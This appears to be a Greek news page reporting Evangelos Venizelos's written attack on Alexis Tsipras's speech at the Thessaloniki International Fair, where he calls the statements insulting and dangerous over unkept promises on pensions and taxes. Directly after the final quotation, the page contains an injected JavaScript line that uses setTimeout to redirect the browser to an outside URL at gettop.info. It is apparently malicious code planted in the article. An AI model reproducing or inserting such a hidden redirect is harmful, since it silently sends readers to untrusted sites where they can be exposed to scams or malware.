Ευ. Βενιζέλος: Επικίνδυνες οι τοποθετήσεις του Αλ. Τσίπρα

0
7

 

Προσβλητικές κι επικίνδυνες χαρακτηρίζει τις τοποθετήσεις του Αλ. Τσίπρα στη ΔΕΘ ο Ευάγγελος Βενιζέλος σε άρθρο του στην ιστοσελίδα «capital».

«Είναι χρήσιμο να διαχωριστούν σε αυτές που είναι προσβλητικές για τη νοημοσύνη του ελληνικού λαού και σε αυτές που είναι επικίνδυνες για την πορεία της χώρας», τονίζει ο κ. Βενιζέλος και προσθέτει:

«Προσβλητική είναι η αμνησία για τις ωμά ψευδείς υποσχέσεις του «προγράμματος της Θεσσαλονίκης» που παρουσιάστηκε με κυνικά ανεύθυνο τρόπο στη ΔΕΘ του 2014. Εξίσου προσβλητική είναι η άνεση με την οποία διατείνεται ότι εφάρμοσε στο ακέραιο τις υποσχέσεις του – επίσης προεκλογικές – στη ΔΕΘ του Σεπτεμβρίου 2015.

Μεταξύ αυτών, περιλαμβάνει προφανώς και όσα κατάλαβαν οι πολίτες ότι υποσχέθηκε πέρυσι για τις συντάξεις, τον ΕΝΦΙΑ, τη φορολογική πολιτική.

Προσβλητικό είναι το θράσος με το οποίο προσχωρεί, σαν να μη συνέβη τίποτα, στις θέσεις των αντιπάλων του. Το προσβλητικό καθίσταται όμως επικίνδυνο όταν η κυβέρνηση δηλώνει με αυτάρεσκο και αλαζονικό τρόπο ότι τα πράγματα «πάνε πολύ καλά και θα πάνε καλύτερα» μέσα από τη συνέχιση της ίδιας πολιτικής». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here